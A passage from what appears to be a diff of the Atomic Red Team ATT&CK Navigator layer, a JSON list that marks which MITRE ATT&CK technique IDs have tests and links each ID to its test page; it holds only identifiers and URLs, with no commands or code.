aryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/ma